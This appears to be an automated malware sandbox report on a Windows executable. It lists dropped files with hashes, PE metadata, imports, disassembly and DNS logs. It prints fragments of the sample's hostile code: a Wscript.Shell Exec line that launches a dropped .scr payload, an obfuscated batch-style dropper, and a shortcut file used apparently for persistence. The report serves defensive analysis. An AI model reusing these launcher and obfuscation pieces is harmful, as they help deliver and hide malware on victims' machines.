                                        Preview:.d.v..B.9.7/d.}...D.9.a.o.........|.........'EP.....-..N.....I ..Q.yh.>..F....,....IG.%w...6...HN{<...+.W...AP.`.0......<..C.?wr....D...T...).n..X+.bR.......u.".c..(..I.?.U...3|..>\..1.t...@."..8..~p|PH.w..%..`......H....q'}..W..!..xj..Yr..FC.J{j.R.L..9P.>.;{P...x....EB[..?.p.......70..Qu6..#....L......K..|..]]W;.e.4..5HS.a.F......fz.v%..9eU..:u..U6.L.%..0.X..[.....L...Wc.a.....L@(J/..M[.../.9'.)(5..R........y.X...)%Kn(....P..Td.rJo.|}.,..~......TA.x.P_...v...0.V..M.r3...I........[.)9.Z........%.a.J.._..Z{\.J.~8...h.....yI.Q...Cf.\.H.s'.......$...&.T3Z.j.Ikz..._z:..@$.ZB....T7..sJ.O.... .{:._..A..=u3`=..zET...hg..v..p..8\..2{s.h.....wf..\.....m.o.2.s......!..Li..&..#.n..N..@.Vb^.P1.....a..*{'.........W.Q....h.......-.....s....7#7pa.....D.(.I.>......w+a.r.Rs.eZ9.....5hu.N.a....;..c.....A...j9.K.9..B .V$..w\.U0..A...C...d.....Z..A....Tl.....2...B.~..r"..cN..//.v.j.1'..@..+X}m;R.6.....gZ..c..FX.1j1..S.N.....!!2...!..*....n...
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):887414
                                        Entropy (8bit):6.622190605745006
                                        Encrypted:false
                                        SSDEEP:12288:mV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:sxz1JMyyzlohMf1tN70aw8501
                                        MD5:940CFDB65F7BC68DA0FEDA43B0FB9411
                                        SHA1:95A5A7D530739861EABC5CCE1C2C8377F715CBE2
                                        SHA-256:04203DD4C6EB5137FCD9B151A46CB05416DB4C696DD6CB66C61BD006B3FD29AF
                                        SHA-512:1D8C535AA65062B6080F9096ACDF17FAE1CB5254BD5370BA4D41A047AC7BFDC959A13C38D1CEDE4508CDAFC2B34D5CE61F7B2A9B990B7F0A617BF639584B1354
                                        Malicious:false
                                        Preview:xL.....0.........F.;G.............................................}...VW.....~d.......~h.......~D........~P.......>.t..6..<.I..&..u...wL..x.....4xL..U.B.U.;...V....u... .........$..........xL........t.Q........xL..... ....wL.J...wL.;5.xL.u....xL.....xL.........._^..u..5.wL.R....I..%.wL.....xL...t...xL..D...8.u...xL.........]...U.....M...xL.SVW.....wL..u....]......j....E....(.I..{L...t..{L.....}....$xL.......KH..yi..........wq....&@..$.e&@..E...........}....{L.uUj...(.I.P.u... .I..}........j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.|.....a....}..t...|...;............}..t......._^[..]....}....t.....x...|......U...M.VW...........|P;......H.Bt.......t<.u..@....M.....B`....8.t"...
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:ASCII text, with very long lines (409), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):9421
                                        Entropy (8bit):5.07777135124763
                                        Encrypted:false
                                        SSDEEP:192:UbwRrmoiNqYzhrJgtohEoDV3qHlGkZu8qjDp4d5n4KDb/+iuMAnvo:UYrmbvzn9ht6HckZ5q/p4dpb/bD
                                        MD5:F086A74422EBE1B06F38B9A07B75912C
                                        SHA1:1F43CC890BE92223ABC5F1C11D17C5C11CACD234
                                        SHA-256:8005560F436629CF0F68742107AF662E4013AE82F6148FCC243DBD8C5555F385
                                        SHA-512:0039DDD8E0E22C7927F4D76DE74E4C899EAAFDE7A37E143345022A24EBD143DFB5F9B5E2BE19B893CB13364942E7D19C1667A3C4176DFF9F23E3EE0575EEDCA5
                                        Malicious:false
                                        Preview:Set Bill=1..woHSeeker Msn Testing Folders Complicated Mixed ..MtJDealt Airlines Clearing Mess Sharing Mercy Organisations Operators ..kijKChorus Foam Soc Duke Beginning Kelkoo Still ..HFPrefer Validation Narrative Accident ..MIlmItalian Analyst ..GUMainly Vi Hint Pee ..lIwMeasured Inline ..Set Image=A..zzTPenny Professionals Transfers Probability ..MSePCharacteristics Concern Recommend ..SUHKazakhstan Medline Walked Oops ..tpLying Resulting Pos Budapest Cleanup Valid Struck Adjusted ..OYWNJimmy Implemented Micro Diffs Addition Frontpage Cited Galleries ..NTwExceptional Insight Almost Persian Specialist Letting Todd Cookbook ..zIConvention Falling ..CtWLOperated Ballot Loans Assigned Schema Av ..Set Writer=u..VOFDrainage Cs Silicon ..jKPrix Pussy Charged One Year Integrate ..JOdfSubstances Ken Graph Purposes Cradle ..QuCrawford ..mtyStrategies Locate Raising Gay Clean Detroit Blocked Universal Spend ..ZPdEver Mostly Butler ..hMQLender Newsletters Div Helmet Moses May Jesus Christian ..S
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with very long lines (409), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):9421
                                        Entropy (8bit):5.07777135124763
                                        Encrypted:false
                                        SSDEEP:192:UbwRrmoiNqYzhrJgtohEoDV3qHlGkZu8qjDp4d5n4KDb/+iuMAnvo:UYrmbvzn9ht6HckZ5q/p4dpb/bD
                                        MD5:F086A74422EBE1B06F38B9A07B75912C
                                        SHA1:1F43CC890BE92223ABC5F1C11D17C5C11CACD234
                                        SHA-256:8005560F436629CF0F68742107AF662E4013AE82F6148FCC243DBD8C5555F385
                                        SHA-512:0039DDD8E0E22C7927F4D76DE74E4C899EAAFDE7A37E143345022A24EBD143DFB5F9B5E2BE19B893CB13364942E7D19C1667A3C4176DFF9F23E3EE0575EEDCA5
                                        Malicious:false
                                        Preview:Set Bill=1..woHSeeker Msn Testing Folders Complicated Mixed ..MtJDealt Airlines Clearing Mess Sharing Mercy Organisations Operators ..kijKChorus Foam Soc Duke Beginning Kelkoo Still ..HFPrefer Validation Narrative Accident ..MIlmItalian Analyst ..GUMainly Vi Hint Pee ..lIwMeasured Inline ..Set Image=A..zzTPenny Professionals Transfers Probability ..MSePCharacteristics Concern Recommend ..SUHKazakhstan Medline Walked Oops ..tpLying Resulting Pos Budapest Cleanup Valid Struck Adjusted ..OYWNJimmy Implemented Micro Diffs Addition Frontpage Cited Galleries ..NTwExceptional Insight Almost Persian Specialist Letting Todd Cookbook ..zIConvention Falling ..CtWLOperated Ballot Loans Assigned Schema Av ..Set Writer=u..VOFDrainage Cs Silicon ..jKPrix Pussy Charged One Year Integrate ..JOdfSubstances Ken Graph Purposes Cradle ..QuCrawford ..mtyStrategies Locate Raising Gay Clean Detroit Blocked Universal Spend ..ZPdEver Mostly Butler ..hMQLender Newsletters Div Helmet Moses May Jesus Christian ..S
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):55296
                                        Entropy (8bit):7.996711493434289
                                        Encrypted:true
                                        SSDEEP:1536:9nfL/BAZyNfYgIUHsImw3+ikExBJ9eHJME1NPhOAx:9TZOMBIib+aBveKE1ZgO
                                        MD5:22F635F4C3E0E127FE3CAE9A073E4B79
                                        SHA1:164EE596A288AA0D15456F88E92C3FB2D5F2FA66
                                        SHA-256:7BE474555BF88D6B80FAE01D9E2E210445376CB5E001EC248323AE47BBC7BEA8
                                        SHA-512:583C81A93762732982370736E79393A40EC35C89DDD7CFD4EB1FB1EBDB0CFE11C61262AA013218BE880BF137AE50EF30E364E50A94A34B168DE09BAD98A7AD16
                                        Malicious:false
                                        Preview:XZTx....9/.p.p}.5.w7b.C.s..d..[...~_!....A8Q.....^.|.#....Y....(..'..8/. 9..fYz...8....\..##e...m.....b......~D..Q...B....w...q.r....5<\.2%....JR...=8%.N..R...W..FJ...}=..@.....@.@..k.....1....i..O.G.`...N....2.k.a..)kxiV...3!..-.uk...i.GEc....h.>.>e.4S..U....W.I.-K.(!2.LB>s..e..QN.'...T...c..vL.1....8.......<k.....s|...2,...?..a./..}h7DOF.g.G..c..2T.....8@s.F..s.m...{"...nY..)Z.C..NG|[...X]..0HN.2.....X.s.......y.9.;..1...D.F|...%.1X.LE.,....4.>.t&.\@..)v....tbU..N.O......8Br.-...1~...!........Z....h*?.&........=...D...t.......Eo.o.a..d.*.#..[..F...[...P#T@.Z..x......P"'.y..K..^4._..Z.Y....Omd..C.L.$..]...B@b.w...zyn`.3x.=9j1.c..1..-...lI.......^.Wg.._.+.Tgh..n..@G....7...Xy6...u..bK.D..?.i.5Y=........lr.6[~.W..O.._...6..[..M..%bYw.x.e..b(.mj..*q<%....{.X$_Xs.."...oL.8..P..KUP..4.3U.XR....@..9..I4f.$.z.w........%.+.. i..u.O....k1W.#.m.qQ.P...N.E.o..B./**&h`^..3%..pl5%.D...({$D......[D....}Q.j......J.....4aVjy2Rf.....wAh/.......M.j...6
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):60416
                                        Entropy (8bit):7.996488329444494
                                        Encrypted:true
                                        SSDEEP:1536:SQPwDYMLi06alIz+7OtmUHfEvir6hF8rI9S:FPgb6ayz+2mXimhF8s0
                                        MD5:9F3D0711AE2B1A3641DB0012F578D398
                                        SHA1:5119AC24E807A817A5BC881380493616E7F6B506
                                        SHA-256:F18EA71181E39EBF9D9806BC91E680E2CB323EB8D2E23A321B8B52BE02C17C90
                                        SHA-512:D53035F4ADA44045431CAB8B4AEA9B659281CC251E048612BC39D0C66A1450CB30D51073106FEABBF1BF7EC2E345B81C5819D7F1158963A33B3A204C53B721ED
                                        Malicious:false
                                        Preview:....i...vlV.............!h.jf..<.)..n.Qt..X..#Yn.=.-...........!o.+....5{L.qp..Q..\"J&O7U.xD..........\......d.{E...@=...xv.f.,.....i{..L....^.....?)..E.b7_c..}.20.3#.0..7b...!.0.$&.d!)(...+YF...>..}.9.........4....f*N..G.........Ef....&vIY.."..~..h..D.F....r...jH.X........NA.k.........R6..0..^..../3g..@n.F....T.. ...~.l<.g.X..c9... .[.....7...kE.(.h;....<!;w..i/T.......^..L....U.(.P...)..E.\......Q.J.i....KD#Y.U...WD#v...nZ....g...;c..{b...u.5...f.....(..-..Z....yS.>....c.p....X...)h.L.[.........|..i........l1...X.....&..u.H..e...k.3<!k.~6.......6^...{..l..C.....9."(.....Y..7.>..Z..V.....<8.....3.U..q.p.@29@..}iY|*R........@.D...0@....@.{e..D...P..w..&I..1.&TWg........{..)..i.,.....z..&B..=+...n....>..p..}....f........w.z.../...W.;..~>...f....TH/...u<............4..hW...m...............N..=M.N~..)Tm'....+.8....C!.C..EX...q... G|.*. (....6...J..?4.........W+..!l.Y.![.~....b.A.<......Q..i.gA.l..<.k.`{.).).:.;..`.?x..x...V..{.-
                                        Process:C:\Users\user\AppData\Local\Temp\182349\Beginners.pif
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):181
                                        Entropy (8bit):4.761947727712624
                                        Encrypted:false
                                        SSDEEP:3:RiMIpGXIdPHo55wWAX+Ro6p4EkD5xXE2lfgRIQkLWGrZo5uWAX+Ro6p4EkD5xXEO:RiJBJHonwWDKaJkDvXE2lYuQkiiywWD6
                                        MD5:E8BC0FA9972CE5AB93F96BCF4BF8F85F
                                        SHA1:C8BB025EA9DA51141727E5BAB836AFB2102DF3FD
                                        SHA-256:5406ED316EA6B15A14BF0A468D5E6F998234287F60A4AF2FACC9EA4E577E90A3
                                        SHA-512:C485EA7AE809C2F53BFDE939E98DFCE612638A509AD26D2F0B35DF9886AA338942F7D49EAA5B00C0C5260FD425D3B222AEE2695024E04927C0F55798C7A17EED
                                        Malicious:true
                                        Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\TradeOptimize Dynamics\\TradeHub.scr\" \"C:\\Users\\user\\AppData\\Local\\TradeOptimize Dynamics\\z\"")
                                        Process:C:\Users\user\AppData\Local\Temp\182349\Beginners.pif
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):893608
                                        Entropy (8bit):6.62028134425878
                                        Encrypted:false
                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 5%
                                         • Antivirus: Virustotal, Detection: 11%
                                         Joe Sandbox View:
                                         • Filename: file.exe, Detection: malicious
                                         • Filename: file.exe, Detection: malicious
                                         • Filename: file.exe, Detection: malicious
                                         • Filename: file.exe, Detection: malicious
                                         • Filename: file.exe, Detection: malicious
                                         • Filename: file.exe, Detection: malicious
                                         • Filename: file.exe, Detection: malicious
                                         • Filename: file.exe, Detection: malicious
                                         • Filename: file.exe, Detection: malicious
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\182349\Beginners.pif
                                        File Type:SysEx File - Harmony
                                        Category:dropped
                                        Size (bytes):527122
                                        Entropy (8bit):7.99963712608285
                                        Encrypted:true
                                        SSDEEP:12288:rjHgoZqjIFzXqCQx0xCJXUpjMFMxvrbNotLgiV5aLleFz7:jimXKgBMFYvu9mLUFz7
                                        MD5:50B908B6812EC7A27452EFE98E5E659F
                                        SHA1:B33663A2FECA423DC0ADD80050D9678044FD52D2
                                        SHA-256:9A2791A019D3171D07703C70ACEBB39E816B3D57CE49E6C02FE9210A9DF7D601
                                        SHA-512:A13F1CC17B08CF1E7F447ADB3C6D8E103C932B854E560A768ABCA5E832912D1AC29685D04E22B616136DC0A81CF457B99ED1006081A856F3120D0AFEF2C5C8F1
                                        Malicious:false
                                        Preview:..7.v..Z..%+...=......g...Mi.0w..K&.?..8..V..{.?......_.@..q.)...........Hi....u..J......C|..+b.`./.Xxq.T...U0..H..KM..........x.y...l..Q.Z..b..-..zCm...Di.x.c.%.Y.g..*.?.?.7.R...(.=.>...>QF..15x.>..7.P.-.D.e%....:...G....=5....\.=).).~.#T.j.:).6.{.0#j%'sx..U6....._...i....r......-,.....4....).P6I!T.n'|,w:...lD...x...[QZ.l.)..."h.90....Z...[.....K."<........x..q.....s.Q..B.|.,#...nF..6..J...Qn....w.....5......a.p*..XK.)..?...>..O..u..t..k....dh.......@......C3..K..Q..i..Onc..7..b..5u...fz<.......;4..t...........;....].D,.%pU..A.P.d R.....0../..8..Fw.H.[6)..U.J....V....;@x+@.|r..u..............N.@..K. ......].....y...WI.[.A.t-.IJu..x.,..e.....C.[./.Q.J..... ..[...B.$M..I.zh........$.8.40..D..u.[..6.M..2.7.d.m6..A^......9.....].........i.m. ....z..?.<E....&+.h..jCr.tT...P.M.f.2G.bf.Vv.G.q=...:..3......".T.u..AW!..........b.}A..+21-..h..".........*>..J.%...E..W...*.0...h.;.ceE.-'........vM..z.".G..F..NyaC6...b.r.G...:YX..@x.RIJe..<.WC....(..;.
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" >), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):95
                                        Entropy (8bit):4.990600019916754
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5xXnfgRIvAkLPgFy:HRYF5yjowkn23RnYuYkUy
                                        MD5:6CCE1D322BB1682B00B64E2328D7B120
                                        SHA1:8EE5C24BCDF55245950017EA512BBC1FCD032625
                                        SHA-256:D27F9E410363A0C570023314CFE2DA6E53999CDA22AB48F0966C06EBA66C6A57
                                        SHA-512:21C53F8B6BD50D02F445A1470F84F291AC5F2F3F28E8C20370B0D438CCCA43789BEFC76B6D84459FA047C8F4F99BCA356C745F0C3AAF625316D98315C3436A8B
                                        Malicious:true
                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" ..
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.904754636262584
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:1'048'576 bytes
                                        MD5:db7b43084f7a44e3290774e36d49ce41
                                        SHA1:1e1321a6e0c6f63b719daccdacbde4a10547021e
                                        SHA256:a6da6ca04ee56f1e10dc25c07f938300fff7b3c1b50abe925b5f2b10b084216b
                                        SHA512:4aed7c811149bef41a2cf6383ca2ed6ce8cd4d5de72d23c75c6a5a8c69afea4af9a894b088a344571e3b93d743786d488ef6fb0e8efb530991e1f7ce3d212ecb
                                        SSDEEP:24576:0R6fmjDVJkCBEbXRNdyfxFAUrQO8+m3McolTzUJ+cv:Qjk9bhNdcUD+m3MzTC+Y
                                        TLSH:302523D3A4F98146F5313EF137A551300A6EBC3E8D1895461B45BBBA36338CA8638B77
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                        Icon Hash:baaafaf8e4a69ab6
                                        Entrypoint:0x403883
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:0
                                        File Version Major:5
                                        File Version Minor:0
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:0
                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                        Instruction
                                        sub esp, 000002D4h
                                        push ebx
                                        push ebp
                                        push esi
                                        push edi
                                        push 00000020h
                                        xor ebp, ebp
                                        pop esi
                                        mov dword ptr [esp+18h], ebp
                                        mov dword ptr [esp+10h], 00409268h
                                        mov dword ptr [esp+14h], ebp
                                        call dword ptr [00408030h]
                                        push 00008001h
                                        call dword ptr [004080B4h]
                                        push ebp
                                        call dword ptr [004082C0h]
                                        push 00000008h
                                        mov dword ptr [00472EB8h], eax
                                        call 00007F9788D9A19Bh
                                        push ebp
                                        push 000002B4h
                                        mov dword ptr [00472DD0h], eax
                                        lea eax, dword ptr [esp+38h]
                                        push eax
                                        push ebp
                                        push 00409264h
                                        call dword ptr [00408184h]
                                        push 0040924Ch
                                        push 0046ADC0h
                                        call 00007F9788D99E7Dh
                                        call dword ptr [004080B0h]
                                        push eax
                                        mov edi, 004C30A0h
                                        push edi
                                        call 00007F9788D99E6Bh
                                        push ebp
                                        call dword ptr [00408134h]
                                        cmp word ptr [004C30A0h], 0022h
                                        mov dword ptr [00472DD8h], eax
                                        mov eax, edi
                                        jne 00007F9788D9776Ah
                                        push 00000022h
                                        pop esi
                                        mov eax, 004C30A2h
                                        push esi
                                        push eax
                                        call 00007F9788D99B41h
                                        push eax
                                        call dword ptr [00408260h]
                                        mov esi, eax
                                        mov dword ptr [esp+1Ch], esi
                                        jmp 00007F9788D977F3h
                                        push 00000020h
                                        pop ebx
                                        cmp ax, bx
                                        jne 00007F9788D9776Ah
                                        add esi, 02h
                                        cmp word ptr [esi], bx
                                        Programming Language:
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ C ] VS2010 SP1 build 40219
                                        • [RES] VS2010 SP1 build 40219
                                        • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0xf6a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0xf6a0 | 0xf800 | 371b69fb39c50291af33e52b15bbd4bd | False | 0.46233933971774194 | data | 5.945826329561015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x104000 | 0xf32 | 0x1000 | 87c9e2d71f37c12833b915bfb48a871b | False | 0.546875 | data | 5.625060303810123 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf41c0 | 0x9928 | Device independent bitmap graphic, 96 x 192 x 32, image size 39168 | English | United States | 0.4530197918792083
RT_ICON | 0xfdae8 | 0x5638 | Device independent bitmap graphic, 72 x 144 x 32, image size 22032 | English | United States | 0.5055726712577021
RT_DIALOG | 0x103120 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x103220 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x103340 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x1033a0 | 0x22 | data | English | United States | 0.9705882352941176
RT_MANIFEST | 0x1033c8 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 02:30:33.502398968 CEST | 49866 | 53 | 192.168.2.4 | 1.1.1.1
Oct 2, 2024 02:30:33.516901970 CEST | 53 | 49866 | 1.1.1.1 | 192.168.2.4
Oct 2, 2024 02:30:46.275460005 CEST | 51561 | 53 | 192.168.2.4 | 1.1.1.1
Oct 2, 2024 02:30:46.283523083 CEST | 53 | 51561 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 02:30:33.502398968 CEST | 192.168.2.4 | 1.1.1.1 | 0x653a | Standard query (0) | bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH | A (IP address) | IN (0x0001) | false
Oct 2, 2024 02:30:46.275460005 CEST | 192.168.2.4 | 1.1.1.1 | 0x3734 | Standard query (0) | bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 02:30:33.516901970 CEST | 1.1.1.1 | 192.168.2.4 | 0x653a | Name error (3) | bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 02:30:46.283523083 CEST | 1.1.1.1 | 192.168.2.4 | 0x3734 | Name error (3) | bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH | none | none | A (IP address) | IN (0x0001) | false
                                        Target ID:0
                                        Start time:20:30:28
                                        Start date:01/10/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x400000
